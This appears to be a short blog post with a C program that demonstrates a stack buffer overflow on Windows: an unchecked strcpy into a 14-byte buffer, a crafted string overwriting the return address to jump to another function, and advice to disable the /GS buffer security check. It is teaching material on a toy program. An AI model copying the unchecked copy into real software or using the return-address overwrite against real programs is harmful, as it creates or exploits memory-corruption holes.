#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void shankar()
{
printf("\n\nAey,\nWhat's up doc :) \n\n");
exit(10) ;
}
void vijay(char *input)
{
char buffer[14];
strcpy(buffer,input);
}
int main()
{
//print some useful information for the hack
printf("main=%p\n",main);
printf("vijay=%p\n",vijay);
printf("shankar=%p\n",shankar);
vijay("ABCDEFGHIJKLMNOPQRVS\xdc\x10\x41\x00");
return 0;
}
This program was compiled on windows using Visual Studios 2008
This program works same as the linux version, there is however a difference; the C compiler on windows places some extra data on the stack just after the return address (notice the length of the garbage string is 2 bytes more in this case as compared to the linux version); it does it so that it can verify after the function return that the return address is not tampered.
To make this program work, turn off "Buffer security check" using /GS- option from the command line or through the program properties in visual studios, else you might not get upto the return address and even if you managed to find the return address on the stack and change it, you will not able to execute it because the system will come to know that the return address is tampered and it will stop the execution of the program.
You need to change the return address in the string that is passesd to vijay() function else the program will segfault. The manner in which the return address is written remain the same for both linux and windows.
Hope you all find this a bit useful ;)
No comments:
Post a Comment